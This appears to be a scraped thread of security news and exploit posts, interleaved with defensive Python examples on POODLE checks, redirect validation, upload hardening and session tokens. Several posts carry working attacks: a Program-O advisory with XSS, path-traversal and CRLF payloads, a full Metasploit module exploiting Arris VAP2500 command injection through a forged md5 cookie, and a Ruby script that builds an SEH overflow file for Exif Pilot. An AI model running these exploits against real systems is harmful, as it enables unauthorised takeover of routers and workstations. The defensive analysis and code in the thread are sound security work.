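The post above describes POODLE as a forced downgrade to SSLv3 and names disabling SSLv3 as the fix. The following is an added example, not code from the original post, showing what a defender can check on the wire: it parses a ClientHello record, reports the version the client is asking for, and looks for TLS_FALLBACK_SCSV (0x5600, the RFC 7507 signalling suite a client adds when it retries at a lower version so that an up-to-date server can refuse the downgrade). The sample ClientHello bytes are constructed inline; the server policy flag is an assumption standing in for your real configuration.

```python
# Added example; not code from the original post. It inspects a captured
# ClientHello (constructed below) and reports whether the client is asking
# for SSLv3 and whether it signals a fallback with TLS_FALLBACK_SCSV
# (RFC 7507). Runs offline; no network access needed.
import struct

VERSION_NAMES = {
    (3, 0): "SSLv3",
    (3, 1): "TLS 1.0",
    (3, 2): "TLS 1.1",
    (3, 3): "TLS 1.2",
}
TLS_FALLBACK_SCSV = 0x5600  # RFC 7507 signalling cipher suite value
HANDSHAKE = 0x16            # record-layer content type
CLIENT_HELLO = 0x01         # handshake message type


def build_client_hello(major, minor, suites):
    """Constructed sample input: a minimal ClientHello (no extensions)."""
    cs = b"".join(struct.pack(">H", s) for s in suites)
    hello = (bytes([major, minor]) + bytes(32)        # client_version, random
             + b"\x00"                                # empty session id
             + struct.pack(">H", len(cs)) + cs        # cipher suites
             + b"\x01\x00")                           # null compression only
    hs = bytes([CLIENT_HELLO]) + len(hello).to_bytes(3, "big") + hello
    return bytes([HANDSHAKE, major, minor]) + struct.pack(">H", len(hs)) + hs


def parse_client_hello(record):
    """Return the client's version, its cipher suites and the downgrade flags."""
    if len(record) < 5 or record[0] != HANDSHAKE:
        raise ValueError("not a handshake record")
    rec_len = struct.unpack(">H", record[3:5])[0]
    body = record[5:5 + rec_len]
    if len(body) != rec_len or body[0] != CLIENT_HELLO:
        raise ValueError("not a ClientHello")
    hs_len = int.from_bytes(body[1:4], "big")
    hello = body[4:4 + hs_len]
    if len(hello) != hs_len:
        raise ValueError("truncated ClientHello")
    version = (hello[0], hello[1])
    pos = 2 + 32                     # skip client_random
    pos += 1 + hello[pos]            # skip session id
    cs_len = struct.unpack(">H", hello[pos:pos + 2])[0]
    pos += 2
    suites = [struct.unpack(">H", hello[i:i + 2])[0]
              for i in range(pos, pos + cs_len, 2)]
    return {
        "client_version": VERSION_NAMES.get(version, "unknown %d.%d" % version),
        "cipher_suites": suites,
        "offers_sslv3": version == (3, 0),
        "fallback_scsv": TLS_FALLBACK_SCSV in suites,
    }


def assess(record, server_allows_sslv3):
    """Defender's verdict for one ClientHello against an assumed server policy."""
    info = parse_client_hello(record)
    if not info["offers_sslv3"]:
        return "ok: client negotiates TLS"
    if not server_allows_sslv3:
        return "ok: SSLv3 disabled on the server, handshake fails closed"
    if info["fallback_scsv"]:
        return "ok: fallback signalled, an RFC 7507 server answers inappropriate_fallback"
    return "at risk: SSLv3 would be negotiated (POODLE exposure)"


if __name__ == "__main__":
    print(assess(build_client_hello(3, 0, [0x002F]), server_allows_sslv3=True))
    print(assess(build_client_hello(3, 0, [0x002F, TLS_FALLBACK_SCSV]), True))
```

The verdict logic mirrors the post's advice: with SSLv3 disabled server-side the question never arises, and where it cannot yet be disabled, the SCSV flag is the only thing that lets the server tell a genuine legacy client apart from a modern client being pushed down.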
  17. @z4rk go to the police as soon as possible and report him; if he gets away with a phone from you, a phone from x, y, z, tomorrow he moves on to theft, rape, murder and who knows what the hell... Don't protect him (if you know about him and do nothing, it's as if you were his accomplice).
  18. A critical cross-site scripting (XSS) vulnerability in the Google Apps administrator console allowed cyber criminals to force Google Apps admins to execute just about any request on the https://admin.google.com/ domain.

The Google Apps admin console allows administrators to manage their organization’s account. Administrators can use the console to add new users, configure permissions, manage security settings and enable Google services for their domain. The feature is primarily used by many businesses, especially those using Gmail as the e-mail service for their domain.

The XSS flaw allowed attackers to force the admin to perform the following actions:

- Creating new users with "super admin" rights
- Disabling two-factor authentication (2FA) and other security measures from existing accounts or from multiple domains
- Modifying domain settings so that all incoming e-mails are redirected to addresses controlled by the attacker
- Hijacking an account/email by resetting the password, disabling 2FA, and also removing login challenges temporarily for 10 minutes

This new zero-day vulnerability was discovered and privately reported by application security engineer Brett Buerhaus to Google on September 1, and the company fixed the flaw within 17 days. In exchange for the report, Google paid the researcher $5,000 as a reward under its bug bounty program.

According to the researcher, when users access a service that hasn’t been configured for their domain, they are presented with a "ServiceNotAllowed" page. This page allows users to switch between accounts in order to log in to the service. However, when one of the accounts was selected, a piece of JavaScript code was executed in an attempt to redirect the user’s Web browser. JavaScript code could be supplied by the user in the "continue" request parameter of the URL, which allowed XSS attacks.

Patching the vulnerability on the 17th day after it was reported to the company shows the search engine giant’s concern to secure its software and users as well. However, Microsoft’s recent vulnerability troubles saw three serious zero-day vulnerabilities in the Windows 7 and 8.1 operating systems exposed one after another, reported by Google’s Project Zero team. Microsoft wasn't able to fix the security flaws in its software even after the three-month-long time period provided to the company.

Source
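The post attributes the flaw to a "continue" parameter that ended up inside a redirect script. As an added example, not code from the original post and not Google's code, here is the defensive handling of such a parameter: validate it as an https URL on an allow-listed host before doing anything with it, and if it has to be written into a script, emit it as a JSON string literal rather than splicing text into the page. The host names and default target are constructed for the example.

```python
# Added example; not code from the original post or from Google. Shows
# allow-list validation of a "continue" redirect parameter and a safe way
# to place the result inside inline JavaScript. Host names are constructed.
import json
from typing import Optional
from urllib.parse import urlsplit, urlunsplit

ALLOWED_HOSTS = {"admin.example.test"}           # constructed allow-list
DEFAULT_CONTINUE = "https://admin.example.test/"  # constructed fallback target


def safe_continue_url(value: Optional[str]) -> str:
    """Return a redirect target on an allowed host, or the default."""
    if not value:
        return DEFAULT_CONTINUE
    try:
        parts = urlsplit(value.strip())
    except ValueError:                            # e.g. malformed IPv6 brackets
        return DEFAULT_CONTINUE
    # javascript:, data:, scheme-less and protocol-relative (//host) values all
    # fail the scheme test; user@ or :port in the netloc fail the host test
    if parts.scheme != "https" or parts.netloc.lower() not in ALLOWED_HOSTS:
        return DEFAULT_CONTINUE
    # rebuild from validated parts only, dropping the fragment
    return urlunsplit(("https", parts.netloc.lower(), parts.path or "/",
                       parts.query, ""))


def redirect_script(value: Optional[str]) -> str:
    """Inline redirect the parameter cannot break out of: json.dumps quotes
    the value and every '<' is escaped, so '</script>' can never be injected."""
    literal = json.dumps(safe_continue_url(value)).replace("<", "\\u003c")
    return "<script>window.location.replace(%s);</script>" % literal


if __name__ == "__main__":
    for candidate in (None, "javascript:alert(1)", "//evil.test/",
                      "https://admin.example.test/users?x=1#f"):
        print(repr(candidate), "->", safe_continue_url(candidate))
```

The allow-list is deliberately a set of exact host strings: a bare string prefix check ("startswith admin.example.test") would still accept admin.example.test.evil.test, which is the usual way such validators are bypassed.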
  19. UPDATE–Adobe has released an emergency update for Flash to address a zero-day vulnerability that is being actively exploited. The company also is looking into reports of exploits for a separate Flash bug not fixed in the new release, which is being used in attacks by the Angler exploit kit. The vulnerability that Adobe patched Thursday is under active attack, but Adobe officials said that this flaw is not the one that security researcher Kafeine said Wednesday was being used in the Angler attacks. “Adobe has released security updates for Adobe Flash Player for Windows, Macintosh and Linux. These updates address a vulnerability that could be used to circumvent memory randomization mitigations on the Windows platform,” Adobe said in its advisory. “Adobe is aware of reports that an exploit for CVE-2015-0310 exists in the wild, which is being used in attacks against older versions of Flash Player. Additionally, we are investigating reports that a separate exploit for Flash Player 16.0.0.287 and earlier also exists in the wild.” The patch for Flash comes just a day after Kafeine disclosed that some instances of the Angler exploit kit contained an exploit for a previously unknown vulnerability in the software. Adobe officials said Wednesday that they were investigating the reports. Kafeine initially saw Angler attacking the latest version of Flash in IE on Windows XP, Vista, 7 and 8, but said the exploit wasn’t being used against Chrome or Firefox. On Thursday he said on Twitter that the group behind Angler had changed the code to exploit Firefox as well as fully patched IE 11 on Windows 8.1. The Flash zero-day exploit is being used to install a version of the Bedep malware, which is used in ad fraud campaigns. “One last bad news : Windows 8.1 Internet Explorer 11 fully updated is now owned as well,” Kafeine said. 
Adobe late on Thursday said that it plans to release a patch for the second zero-day flaw in Flash–the one being used by the Angler exploit kit–next week, but did not specify an exact release date. The vulnerability affects the latest versions of Flash. “A critical vulnerability (CVE-2015-0311) exists in Adobe Flash Player 16.0.0.287 and earlier versions for Windows and Macintosh. Successful exploitation could cause a crash and potentially allow an attacker to take control of the affected system,” Adobe said in an advisory. “We are aware of reports that this vulnerability is being actively exploited in the wild via drive-by-download attacks against systems running Internet Explorer and Firefox on Windows 8 and below.” Angler is among the more dangerous exploit kits being used right now and the group behind the kit often has exploits for Flash vulnerabilities within days of a new Adobe patch being published. Adobe officials did not say whether there is an update in the works for the zero-day vulnerability. Source
  20. The Regin malware platform used to steal secrets from government agencies, banks and GSM network operators caught the attention of security experts who called it one of the most advanced attack platforms that has been studied, surpassing Flame, Duqu, even Stuxnet. Researchers at Kaspersky Lab said Regin could be tuned to attack large organizations or even individuals, pointing out that noted cryptographer Jean Jacques Quisquater was one of its first public victims. Today, details about a pair of Regin modules were released by Kaspersky’s Global Research and Analysis Team, one module used for lateral movement, while the other establishes a backdoor in order to move data off compromised machines. The researchers, Costin Raiu and Igor Soumenkov, concede that the modules, named Hopscotch and Legspin, have likely been put out of commission by those responsible for Regin and replaced by new modules. Attribution, meanwhile, remains another mystery to Regin, though some were quick to pin either the U.S. National Security Agency, or the U.K.’s GCHQ as the perpetrators. Regin was revealed in November by Kaspersky Lab, which said it has been detected on Windows computers belonging to 27 organizations in 14 countries, most of those in Asia and the Middle East. The GSM (Global System for Mobile Communication) characteristic to Regin is a relatively unique feature to APT-style attacks, and particularly concerning given the lax security used in mobile communication protocols. The attackers were able to steal credentials from an internal GSM Base Station Controller belonging to a large telecom operator that gave them access to GSM cells in that particular network, Kaspersky Lab said. Base Station Controllers manage calls as they move along a mobile network, allocating resources and mobile data transfers. With this kind of access, the attackers knew information about calls processed by particular cells, and were able to redirect calls, activate other cells and steal data. 
“At the present time, the attackers behind Regin are the only ones known to have been capable of doing such operations,” Raiu said at the time.

Today’s report provides an in-depth analysis of two of four modules belonging to Regin (hashes, compile dates, file type and size are listed on the Securelist blog). “Despite the overall sophistication (and sometimes even over-engineering) of the Regin platform, these tools are simple, straightforward and provide interactive console interfaces for Regin operators,” the researchers wrote. “What makes them interesting is the fact they were developed many years ago and could even have been created before the Regin platform itself.”

Hopscotch, for example, is a standalone tool used by the attackers for lateral movement. It relies on stolen credentials to authenticate itself on remote computers, and contains no exploits, Raiu and Soumenkov said. “The module receives the name of the target machine and an optional remote file name from the standard input (operator),” Raiu and Soumenkov wrote. “The attackers can choose from several options at the time of execution and the tool provides human-readable responses and suggestions for possible input.” The module creates a new service to launch a payload extracted from a remote server using a two-way encrypted channel: one direction forwards input from the operator to the payload, the other writes data from the payload to the standard output. The executable injects itself into a new process for persistence and the remote operator can interact with the module. “Once completed, the tool deletes the remote file and closes the authenticated sessions, effectively removing all the traces of the operation,” Raiu and Soumenkov wrote.

Legspin is another standalone module; this one is a command line utility for computer administration, and operates as a backdoor. “It is worth noting that the program has full console support and features colored output when run locally,” Raiu and Soumenkov wrote. “It can even distinguish between consoles that support Windows Console API and TTY-compatible terminals that accept escape codes for coloring.” There are clues within the module that hint it was developed around 2002-2003; it also uses legacy API functions such as NetBIOS, which was deprecated from Windows with the launch of Vista. This module gives the remote attacker an interactive command prompt, and a long list of commands at their disposal, including the ability to retrieve and upload files, connect to a remote share, retrieve server configuration data, create processes, and much more. “It’s worth pointing that not all Regin deployments contain the Legspin module; in most cases, the attackers manage their victims through other Regin platform functions,” the researchers wrote. “This means that Legspin could have been used independently from the Regin platform, as a simple backdoor together with an input/output wrapper.”

Source
  21. Google pushed out on Wednesday a new version of its Chrome browser (40.0.2214.91) and along with it paid out more than two dozen bounties, including 16 for memory corruption vulnerabilities. In all, 62 security vulnerabilities were patched, 17 of those considered high-severity bugs by Google. Most of those high-severity vulnerabilities were memory corruption or use-after-free vulnerabilities in a number of Chrome components, including ICU, V8, FFmpeg and DOM. A researcher credited as cloudfuzzer cashed in with $12,000 worth of bounties, including three critical bugs. Another reporter known as yangdingning was awarded $9,000 for his finds.

Here is the list of public vulnerabilities patched in Chrome 40:

[$5000][430353] High CVE-2014-7923: Memory corruption in ICU. Credit to yangdingning.
[$4500][435880] High CVE-2014-7924: Use-after-free in IndexedDB. Credit to Collin Payne.
[$4000][434136] High CVE-2014-7925: Use-after-free in WebAudio. Credit to mark.buer.
[$4000][422824] High CVE-2014-7926: Memory corruption in ICU. Credit to yangdingning.
[$3500][444695] High CVE-2014-7927: Memory corruption in V8. Credit to Christian Holler.
[$3500][435073] High CVE-2014-7928: Memory corruption in V8. Credit to Christian Holler.
[$3000][442806] High CVE-2014-7930: Use-after-free in DOM. Credit to cloudfuzzer.
[$3000][442710] High CVE-2014-7931: Memory corruption in V8. Credit to cloudfuzzer.
[$2000][443115] High CVE-2014-7929: Use-after-free in DOM. Credit to cloudfuzzer.
[$2000][429666] High CVE-2014-7932: Use-after-free in DOM. Credit to Atte Kettunen of OUSPG.
[$2000][427266] High CVE-2014-7933: Use-after-free in FFmpeg. Credit to aohelin.
[$2000][427249] High CVE-2014-7934: Use-after-free in DOM. Credit to cloudfuzzer.
[$2000][402957] High CVE-2014-7935: Use-after-free in Speech. Credit to Khalil Zhani.
[$1500][428561] High CVE-2014-7936: Use-after-free in Views. Credit to Christoph Diehl.
[$1500][419060] High CVE-2014-7937: Use-after-free in FFmpeg. Credit to Atte Kettunen of OUSPG.
[$1000][416323] High CVE-2014-7938: Memory corruption in Fonts. Credit to Atte Kettunen of OUSPG.
[$1000][399951] High CVE-2014-7939: Same-origin-bypass in V8. Credit to Takeshi Terada.
[$1000][433866] Medium CVE-2014-7940: Uninitialized-value in ICU. Credit to miaubiz.
[$1000][428557] Medium CVE-2014-7941: Out-of-bounds read in UI. Credit to Atte Kettunen of OUSPG and Christoph Diehl.
[$1000][426762] Medium CVE-2014-7942: Uninitialized-value in Fonts. Credit to miaubiz.
[$1000][422492] Medium CVE-2014-7943: Out-of-bounds read in Skia. Credit to Atte Kettunen of OUSPG.
[$1000][418881] Medium CVE-2014-7944: Out-of-bounds read in PDFium. Credit to cloudfuzzer.
[$1000][414310] Medium CVE-2014-7945: Out-of-bounds read in PDFium. Credit to cloudfuzzer.
[$1000][414109] Medium CVE-2014-7946: Out-of-bounds read in Fonts. Credit to miaubiz.
[$500][430566] Medium CVE-2014-7947: Out-of-bounds read in PDFium. Credit to fuzztercluck.
[$500][414026] Medium CVE-2014-7948: Caching error in AppCache. Credit to jiayaoqijia.

Google said it awarded an additional $35,000 in bounties to Atte Kettunen of OUSPG, Christian Holler, cloudfuzzer and Khalil Zhani for work done during the development cycle to keep vulnerabilities out of the stable release. This is the first Chrome release of the year; in November, Chrome 39 was released and included removal of support for the fallback to SSL 3.0, the target of the POODLE attack.

Source
  22. Document Title:
===============
Program-O v2.4.6 - Multiple Web Vulnerabilities

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1414

Release Date:
=============
2015-01-21

Vulnerability Laboratory ID (VL-ID):
====================================
1414

Common Vulnerability Scoring System:
====================================
6.3

Product & Service Introduction:
===============================
Welcome to the Program O Project website. This is the home of the Open Source PHP MySQL AIML Chatbot Project. Program O is an AIML engine written in PHP with MySQL. Here you can find support, help, bot addons, a brilliant and friendly community and of course the Program O download files.

(Copy of the Vendor Homepage: http://blog.program-o.com/ )

Abstract Advisory Information:
==============================
An independent Vulnerability Laboratory Researcher discovered multiple vulnerabilities in the official Program-O v2.4.6 web-application.

Vulnerability Disclosure Timeline:
==================================
2015-01-21: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
Program O
Product: Program O AIML Chatbot - Web Application 2.4.6

Exploitation Technique:
=======================
Remote

Severity Level:
===============
High

Proof of Concept (PoC):
=======================
1.1 Client-Side Cross Site Scripting Vulnerability

The xss vulnerabilities can be exploited by remote attackers without privileged application user account and with low user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

http://localhost/Program-O/gui/xml/index.php?convo_id=444%22/%3E%3Csvg/onload=alert%281%29%3E

Cause:
echo $convo_id;
$post_vars = filter_input_array(INPUT_POST) ?: array();
$get_vars = filter_input_array(INPUT_GET) ?: array();
$request_vars = array_merge($get_vars, $post_vars);
$convo_id = $request_vars['convo_id'] ?: get_convo_id ();

1.2 Client-Side Cross Site Scripting Vulnerability

http://localhost/Program-O/gui/xml/index.php/%22%3E%3Csvg/onload=alert%280%29%3E

./Program-O/gui/xml/index.php
echo $_SERVER['PHP_SELF'];

3. /logs/index.php
$iframeURL = $_POST['file'] ?: 'about:blank';
echo $iframeURL;

<form action="http://localhost/Program-O/logs/index.php" method="POST">
<input type="hidden" name="file" value='paulos"/></iframe></div><svg/onload=alert(0)>'>

2.1 Application-Side Cross Site Scripting Vulnerability

The persistent input validation vulnerabilities can be exploited by remote attackers with low privileged application user account and with low user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

/admin/validateAIML.php
Cause: because of
echo $status;
$status = "File $fileName is valid.<br />\n";
Giving valid AIML files names like <svg/onload=alert(0)> should do the trick.

2.2 Application-Side Cross Site Scripting Vulnerability (Only in older php server versions)

/admin/file.php
print "File <strong>$req_file</strong> doesn't exist.";
$req_file = basename($_GET['file']);
Exploit: ?file=">>payload

3. File Manipulation - Local File Include

The local file include vulnerability can be exploited by remote attackers with low privileged application user account and without user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

/admin/validateAIML.php
Cause: because of
move_uploaded_file($_FILES['uploaded']['tmp_name'], $target))
$target = $uploadDir . $ip . '/' . $tf;
$uploadDir = _UPLOAD_PATH_;
define('_UPLOAD_PATH_', _CONF_PATH_ . 'uploads' . $path_separator); // global_config.php define()
define('_CONF_PATH_', _BASE_PATH_ . 'config' . $path_separator); // global_config.php define()
define('_BASE_PATH_', $parentFolder); // global_config.php define()
Exploitation is to give your file(s) names like ../../../file so when they get uploaded, they can cause LFI.

4. LFI, File Manipulation (RCE in some special cases only!)

The local file include vulnerability can be exploited by remote attackers with low privileged application user account and without user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

/admin/upload_old.php
move_uploaded_file($_FILES['aimlfile']['tmp_name'], $file))
$file = './uploads/' . $_FILES['aimlfile']['name'];
Exact same issues in admin/upload.php.

5.1 HTTP Response Splitting (CRLF)

The HTTP Response Splitting issues can be exploited by remote attackers without privileged application user account and with medium or high user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

header("Refresh: 5; url=$whoami?file=$req_file&send_file=yes");
$whoami = basename(__FILE__);
$req_file = basename($_GET['file']);

5.2 HTTP Response Splitting (CRLF)

/admin/download.php
Cause:
$referer = $_SERVER['HTTP_REFERER'];
header("Refresh: 5; url=file.php?file=$zipFilename&send_file=yes&referer=$referer&msg=$msg");
So as long as we spoof our referer to %0A%0DContent-Injection:goes-here

Security Risk:
==============
1.1 - 1.2 The security risk of the client-side cross site scripting vulnerabilities is estimated as medium. (CVSS 2.6)
2.1 - 2.2 The security risk of the application-side input validation web vulnerabilities is estimated as medium. (CVSS 3.7)
3.0 The security risk of the local file include web vulnerability is estimated as high. (CVSS 6.1)
4.0 The security risk of the local file manipulation issue and code execution vulnerability is estimated as high. (CVSS 6.4)

Credits & Authors:
==================
Paulos Yibelo (paulosyibelo.com)

Source
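The advisory above boils down to three weak patterns: a client-chosen upload name used as a filesystem path (sections 3 and 4), user data placed inside a Refresh header (sections 5.1 and 5.2) and a filename echoed into HTML unescaped (sections 1.x and 2.x). The block below is an added example, not code from the advisory or from the Program-O project, giving hardened Python counterparts of each so the fix for every class is visible side by side. The upload root, the per-IP directory layout and the rule that uploads must be .aiml files are assumptions made for the example.

```python
# Added example; not code from the advisory or the Program-O project. It gives
# hardened Python counterparts of the three weak patterns in the advisory:
# client-chosen upload names used as paths (LFI/traversal), user data in a
# Refresh header (CRLF injection) and an unescaped filename in HTML (XSS).
# UPLOAD_ROOT, the per-IP layout and the .aiml rule are assumptions.
import html
import os
import re
from pathlib import Path

UPLOAD_ROOT = Path("/srv/app/uploads")                      # assumed location
SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,99}")   # no '/', '\', '%', ' '
IP_RE = re.compile(r"[0-9A-Fa-f.:]{1,45}")                   # v4 or v6 literal only


def safe_upload_path(client_name, client_ip):
    """Map an uploaded filename to UPLOAD_ROOT/<ip>/<name>, refusing anything
    that could leave that directory or is not an .aiml file."""
    if not IP_RE.fullmatch(client_ip):
        raise ValueError("bad client address")
    # basename() strips any directory part the client smuggled in ('../..')
    name = os.path.basename(client_name.replace("\\", "/"))
    if not SAFE_NAME.fullmatch(name) or not name.endswith(".aiml"):
        raise ValueError("rejected upload name: %r" % client_name)
    target = UPLOAD_ROOT / client_ip / name
    # defence in depth: after normalisation the path must still sit under the root
    root = str(UPLOAD_ROOT)
    if os.path.commonpath([root, os.path.normpath(str(target))]) != root:
        raise ValueError("path escapes upload root")
    return target


def refresh_header(url, seconds=5):
    """Value for a Refresh header; CR, LF and other control characters are
    refused so the value can never start a new header line."""
    if re.search(r"[\x00-\x1f\x7f]", url):
        raise ValueError("control character in header value")
    return "%d; url=%s" % (seconds, url)


def status_message(file_name):
    """The 'File X is valid' line with the name HTML-escaped before output."""
    return "File %s is valid.<br />\n" % html.escape(file_name, quote=True)


if __name__ == "__main__":
    print(safe_upload_path("bot.aiml", "10.0.0.5"))
    print(refresh_header("file.php?file=a.zip&send_file=yes"))
    print(status_message("<svg/onload=alert(0)>"), end="")
```

Note that basename() alone would already defeat the ../ names in section 3; the allow-list regex and the commonpath check are there so that a future change to how the path is assembled (a different separator, a decoded name) does not silently reopen the hole.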
  23. ##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Arris VAP2500 tools_command.php Command Execution',
      'Description'    => %q{
        Arris VAP2500 access points are vulnerable to OS command injection in the
        web management portal via the tools_command.php page. Though authentication
        is required to access this page, it is trivially bypassed by setting the
        value of a cookie to an md5 hash of a valid username.
      },
      'Author'         =>
        [
          'HeadlessZeke' # Vulnerability discovery and Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2014-8423'],
          ['CVE', '2014-8424'],
          ['OSVDB', '115045'],
          ['OSVDB', '115046'],
          ['BID', '71297'],
          ['BID', '71299'],
          ['URL', 'http://goto.fail/blog/2014/11/25/at-and-t-u-verse-vap2500-the-passwords-they-do-nothing/']
        ],
      'DisclosureDate' => 'Nov 25 2014',
      'Privileged'     => true,
      'Payload'        =>
        {
          'DisableNops' => true,
          'Space'       => 1024,
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic telnet'
            }
        },
      'Platform'       => 'unix',
      'Arch'           => ARCH_CMD,
      'Targets'        => [[ 'Automatic', { }]],
      'DefaultTarget'  => 0
    ))
  end

  def check
    begin
      res = send_request_raw({
        'method' => 'GET',
        'uri'    => '/tools_command.php',
        'cookie' => "p=#{Rex::Text.md5('super')}"
      })
      if res && res.code == 200 && res.body.to_s =~ /TOOLS - COMMAND/
        return Exploit::CheckCode::Vulnerable
      end
    rescue ::Rex::ConnectionError
      return Exploit::CheckCode::Unknown
    end
    Exploit::CheckCode::Safe
  end

  def exploit
    print_status("#{peer} - Trying to access the device ...")
    unless check == Exploit::CheckCode::Vulnerable
      fail_with(Failure::NotVulnerable, "#{peer} - Failed to access the vulnerable device")
    end

    print_status("#{peer} - Exploiting...")
    if datastore['PAYLOAD'] == 'cmd/unix/generic'
      exploit_cmd
    else
      exploit_session
    end
  end

  def exploit_cmd
    beg_boundary = rand_text_alpha(8)
    end_boundary = rand_text_alpha(8)
    begin
      res = send_request_cgi({
        'uri'       => normalize_uri('/', 'tools_command.php'),
        'vars_post' => {
          'cmb_header'  => '',
          'txt_command' => "echo #{beg_boundary}; #{payload.encoded}; echo #{end_boundary}"
        },
        'method'    => 'POST',
        'cookie'    => "p=#{Rex::Text.md5('super')}"
      })
      if res && res.code == 200 && res.body.to_s =~ /TOOLS - COMMAND/
        print_good("#{peer} - Command sent successfully")
        if res.body.to_s =~ /#{beg_boundary}(.*)#{end_boundary}/m
          print_status("#{peer} - Command output: #{$1}")
        end
      else
        fail_with(Failure::UnexpectedReply, "#{peer} - Command execution failed")
      end
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
    end
  end

  def exploit_session
    begin
      send_request_cgi({
        'uri'       => normalize_uri('/', 'tools_command.php'),
        'vars_post' => {
          'cmb_header'  => '',
          'txt_command' => "#{payload.encoded}"
        },
        'method'    => 'POST',
        'cookie'    => "p=#{Rex::Text.md5('super')}"
      }, 3)
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
    end
  end
end

Source
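The module's description says authentication is bypassed because the session cookie is just the md5 hash of a valid username. As an added example, not code from the module, from Arris or from Metasploit, the block below places that weak check beside a session store that issues unguessable tokens and keeps only their hash server-side, which is what removes the bypass. The user names and the login stub are constructed for the example.

```python
# Added example; not code from the module, from Arris or from Metasploit.
# legacy_* show the weak scheme the module abuses (cookie = md5(username),
# forgeable from public data). SessionStore shows the hardened pattern:
# random token issued only after a real login, stored hashed, looked up by
# hash. KNOWN_USERS and the password_ok flag are constructed stand-ins.
import hashlib
import secrets

KNOWN_USERS = {"super", "admin"}   # constructed


def legacy_cookie(username):
    """How the weak scheme derives the cookie: a hash of public data only."""
    return hashlib.md5(username.encode()).hexdigest()


def legacy_cookie_is_valid(cookie):
    """Vulnerable check: accepts md5(<any known username>), no login needed."""
    return any(cookie == legacy_cookie(u) for u in KNOWN_USERS)


class SessionStore:
    """Hardened check: the token is random, bound to a completed login and
    only its SHA-256 is stored, so a copied session table yields no cookies."""

    def __init__(self):
        self._by_hash = {}

    @staticmethod
    def _key(token):
        return hashlib.sha256(token.encode()).hexdigest()

    def login(self, username, password_ok):
        """password_ok stands in for a real credential check (assumption)."""
        if not password_ok or username not in KNOWN_USERS:
            return None
        token = secrets.token_urlsafe(32)            # 256 bits of entropy
        self._by_hash[self._key(token)] = username
        return token

    def user_for(self, cookie):
        # hashing first means the lookup compares fixed-length digests; the
        # secret itself is never compared byte by byte against stored values
        return self._by_hash.get(self._key(cookie or ""))

    def logout(self, cookie):
        self._by_hash.pop(self._key(cookie or ""), None)


if __name__ == "__main__":
    print("legacy accepts forged cookie:", legacy_cookie_is_valid(legacy_cookie("super")))
    store = SessionStore()
    token = store.login("super", password_ok=True)
    print("hardened accepts its own token:", store.user_for(token) == "super")
    print("hardened accepts forged cookie:", store.user_for(legacy_cookie("super")) is not None)
```

The detection angle follows from the same property: with the weak scheme, a valid-looking cookie can appear in web logs without any preceding login, so a request to the management page whose cookie was never issued by a login is the signal to alert on.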
  24. #!/usr/bin/env ruby
# Exploit Title: Exif Pilot SEH Based Buffer Overflow
# Version: version 4.7.2
# Download: http://www.colorpilot.com/load/exif.exe
# Tested on: Windows XP sp2
# Exploit Author: Osanda M. Jayathissa
# E-Mail: osanda[cat]unseen.is

=begin
Click Tools > Options > Customize 35mm tab > Import > and choose "output.xml".
The p/p/r addresses contain null characters.
=end

require 'rex'

# Builds the UTF-16 XML document; the <maker> value carries the overlong string.
def generate_content(padding1_len, padding2_len)
  header = "\xff\xfe"                                      # UTF-16 LE byte order mark
  header << Rex::Text.to_unicode("<?xml version=\"1.0\" encoding=\"UTF-16\" ?>")
  header << "\x0d\x00\x0a\x00"                              # CR LF in UTF-16
  header << Rex::Text.to_unicode("<efls>")
  header << "\x0d\x00\x0a\x00"
  header << Rex::Text.to_unicode(" <eflitem>")
  header << "\x0d\x00\x0a\x00"
  header << Rex::Text.to_unicode(" <maker>")
  header << Rex::Text.to_unicode("")
  for i in 0..padding1_len
    header << Rex::Text.to_unicode("A")
  end
  header << "\xeb\x00\x06\x00\x90\x00\x90\x00"              # nSEH
  header << Rex::Text.to_unicode("CCCC")                    # SEH
  for i in 0..padding2_len
    header << Rex::Text.to_unicode("A")
  end
  header << "\x0d\x00\x0a\x00\x09\x00\x09\x00"
  header << Rex::Text.to_unicode(" </maker>")
  header << "\x0d\x00\x0a\x00"
  header << Rex::Text.to_unicode(" <model>abc</model>")
  header << "\x0d\x00\x0a\x00"
  header << Rex::Text.to_unicode(" <factor>0.000000</factor>")
  header << "\x0d\x00\x0a\x00"
  header << Rex::Text.to_unicode(" </eflitem>")
  header << "\x0d\x00\x0a\x00"
  header << Rex::Text.to_unicode("</efls>")
  header << "\x0d\x00\x0a\x00"
  return header
end

##
# main
##
filename = 'output.xml'

output_handle = File.new(filename, 'wb')
if !output_handle
  $stdout.puts "Cannot open the file #{filename} for writing!"
  exit(-1)
end

header = generate_content(1619, 7000)

$stdout.puts "Generating file #{filename}"
output_handle.puts header
output_handle.close

$stdout.puts "Done!"
exit 0

#EOF

Source
  25. Introduction

Wardriving is an activity in which a person seeks wireless access points from a moving vehicle with high gain antennas mounted on top. Usually, this access point data is correlated with GPS positions and marked on publicly accessible maps such as WiGLE. On the other hand, wireless penetration tests are focused evaluations of the wireless security of a particular organization. In both of these cases—and in any type of wireless communication—antennas play a critical role. They can mean the difference between hassle-free communication and bitter frustration. However, antenna designs and their implications are arcane topics that deserve sincere exploration by security enthusiasts. The antennas in your arsenal can make or break your wardriving or wireless penetration testing efforts. Whether you are a wardriving aficionado or a wireless penetration tester, this paper is intended to help you choose the best antenna for your requirements.

Terminology You Should Know

